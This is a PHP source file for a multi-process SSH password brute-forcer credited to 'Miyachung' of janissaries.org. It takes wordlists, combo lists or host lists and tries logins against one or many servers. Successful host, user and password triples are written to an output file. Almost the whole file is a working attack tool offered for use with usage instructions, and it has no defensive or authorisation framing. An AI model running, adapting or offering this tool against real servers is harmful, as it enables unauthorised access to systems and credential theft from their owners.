<?php
/*
        .__                      .__                          
  _____ |__|___.__._____    ____ |  |__  __ __  ____    ____  
 /     \|  <   |  |\__  \ _/ ___\|  |  \|  |  \/    \  / ___\ 
|  Y Y  \  |\___  | / __ \\  \___|   Y  \  |  /   |  \/ /_/  >
|__|_|  /__|/ ____|(____  /\___  >___|  /____/|___|  /\___  / 
      \/    \/          \/     \/     \/           \//_____/  
*  SSH Brute-Forcer
*  Written by Miyachung
*  Homepage     : http://janissaries.org
*  Youtube Channel: http://www.youtube.com/janissariesorg
*  Usage       : http://www.youtube.com/watch?v=h5Fx3PBjUCg
*  @@  'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended)
*  @@  This tool is using process forking system
*  All rights reserved
*  Contact with coder: miyachung@hotmail.com or jabber.org
*/
error_reporting(0);
/*
* Call the class
*/
$SSH = new SSHBruter();
/*
* Does control if 'ssh2_connect' and 'pcntl_fork' functions not installed
* if 'ssh2_connect' or 'pcntl_fork' functions not installed you can't use this brute-forcer tool
*/
if(!function_exists("ssh2_connect"))
{
$SSH->showErrorMsg(1);
}
elseif(!function_exists("pcntl_fork"))
{
$SSH->showErrorMsg(2);
}
/*
* Parse arguments
* There is 3 way to brute
* Single  : -h <host> -u <user> -w <wordlist> -o <output> -t <thread>
* Combolist : -c <combolist> -o <output> -t <thread>
* Multiple  : -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>
*/
$options_single  = getopt("h:u:w:o:t:");
$options_combo   = getopt("c:o:t:");
$options_multi   = getopt("f:u:w:o:t:");
/*
* Does arguments control!
*/
if($options_single)
{
  if($options_single["h"] != null && $options_single["u"] != null && $options_single["w"] != null && $options_single["o"] != null && $options_single["t"] != null)
  {
  $SSH->SingleBrute( $options_single["h"] , $options_single["u"] , $options_single["w"] , $options_single["o"] , $options_single["t"] );
  }
  else{
  $SSH->showErrorMsg(3);
  }
}
elseif($options_combo)
{
  if($options_combo["c"] != null && $options_combo["o"] != null && $options_combo["t"] != null)
  {
  $SSH->ComboBrute( $options_combo["c"] , $options_combo["o"] , $options_combo["t"] );
  }
  else{
  $SSH->showErrorMsg(3);
  }
}
elseif($options_multi)
{
  if($options_multi["f"] != null && $options_multi["u"] != null & $options_multi["w"] != null && $options_multi["o"] != null && $options_multi["t"] != null)
  {
  $SSH->MultiBrute( $options_multi["f"] , $options_multi["u"] , $options_multi["w"] , $options_multi["o"] , $options_multi["t"] );
  }
  else{
  $SSH->showErrorMsg(3);  
  }
}
else
{
  $SSH->showErrorMsg(3);
}

class SSHBruter
{
  /*
  * Prints 'MAIN_MESSAGE' if arguments used wrong
  */
  const MAIN_MESSAGE      = "\n*********************************************\n* SSH Brute-Forcer Single or Multiple\n* Written by Miyachung\n* Homepage : http://janissaries.org\n*********************************************\n";
  /*
  * Prints 'NOT_INSTALLED_SSH' if ssh2_connect function not found
  */
  const NOT_INSTALLED_SSH  = "Oops! 'ssh2_connect' function isn't exists you can't use this tool on this machine\n\n";
  /*
  * Prints 'NOT_INSTALLED_PCNTL' if pcntl_fork function not found
  */
  const NOT_INSTALLED_PCNTL= "Oops! 'pcntl_fork' function isn't exists you can't use this tool on this machine\n\n";
  /*
  * Prints 'ARGMISS' if arguments not specified
  */
  const ARGMISS    = "[!]Wrong Usage!\nphp SSHBruter.php -h <host> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -c <combolist> -o <output> -t <thread>\n\n";
  /*
  * Counts hosts & passwords , increments in foreach loop
  */
  private $counter     = 0;
  /*
  * Performs brute force to specified single host arguments -h <host> -u <user> -w <wordlist> -o <output> -t <thread>
  */
  function SingleBrute( $host , $user, $wordlist, $output , $thread )
  {
  echo "\n";
  echo "Host: ".$host."\n";
  echo "User: ".$user."\n\n";
  $chunk_wordlist = array_chunk( file($wordlist) , $thread );
  foreach($chunk_wordlist as $passwords)
  {
    foreach($passwords as $password)
    {
      $this->counter++;
      $fork = pcntl_fork();
      if(!$fork)
      {
      $perform_single = $this->SSH( $host , $user , trim($password) , $output );
      if($perform_single)
      {
      print "Sleeping 120 seconds , PRESS CTRL + C NOW!";
      sleep(120);
      }
      exit;
      }
    }
    $this->waitForThreadFinish();
  }
  
  }
  /*
  * Performs brute force to specified combo list arguments -c <combolist> -o <output> -t <thread>
  */
  function ComboBrute( $combolist , $output , $thread )
  {
  $chunk_combolist = array_chunk( file($combolist) , $thread);
  foreach($chunk_combolist as $combo)
  {
    foreach($combo as $hostuserpwd)
    {
    $this->counter++;
    list($host,$user,$password) = split(":",trim($hostuserpwd));
    $fork = pcntl_fork();
    if(!$fork)
    {
    $this->SSH( $host , $user , $password , $output );
    exit;
    }
    
    }
    $this->waitForThreadFinish();
  }
  
  }
  /*
  * Performs brute force to specified host list arguments -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>
  */
  function MultiBrute( $hostlist , $user , $wordlist , $output , $thread )
  {
    foreach(file($hostlist) as $host)
    {
      $chunk_wordlist = array_chunk( file($wordlist) , $thread );
      foreach($chunk_wordlist as $passwords)
      {
        foreach($passwords as $password)
        {
        $this->counter++;
        $fork = pcntl_fork();
        if(!$fork)
        {
        $this->SSH( trim($host) , $user , trim($password) , $output );
        exit;
        }
        
        }
        $this->waitForThreadFinish();
      }
    }
  }
  /*
  * Performs login to host with specified user and password(s)
  */
  function SSH( $host , $user , $password , $output , $port = 22 )
  {
      $connect = ssh2_connect( $host , $port );
      if(!$connect)
      {
      print "[".$this->counter."] Host: ".$host." Connection Failed\n";
      flush();
      break;
      }
      else
      {
      $auth    = ssh2_auth_password( $connect , $user , $password );
      if($auth)
      {
      $a = "*********************************************\n";
      $a.= "[+] Found!\n";
      $a.= "[+] Host: ".$host."\n";
      $a.= "[+] User: ".$user."\n";
      $a.= "[+] Password: ".$password."\n";
      
      print $a."[!] If You Want To Stop Brute Press CTRL + C Now!\n*********************************************\n";
      self::SaveResult( $output , $a );
      return true;
      }
      else
      {
      print "[".$this->counter."] Trying Host: ".$host." Username: ".$user." Password: ".$password."\n";
      flush();
      break;
      }
      
      }
      
  }
  /*
  * All error messages showing from there
  */
  function showErrorMsg( $errno )
  {
    print self::MAIN_MESSAGE;
    if($errno == 1)
    {
    print self::NOT_INSTALLED_SSH;
    exit;
    }
    if($errno == 2)
    {
    print self::NOT_INSTALLED_PCNTL;
    exit;
    }
    if($errno == 3)
    {
    print self::ARGMISS;
    exit;
    }
    
  }
  /*
  * Waits for threads to finish
  */
  function waitForThreadFinish()
  {
    while (pcntl_waitpid(0, $status) != -1) {
      $status = pcntl_wexitstatus($status);
    }
  }
  /*
  * Saves everything with this function
  */
  static function SaveResult( $output,$text )
  {
  $open_file = fopen( $output , "a" );
  fwrite( $open_file , $text );
  fclose( $open_file );
  }
}

# miyachung represents / janissaries.org group 
?>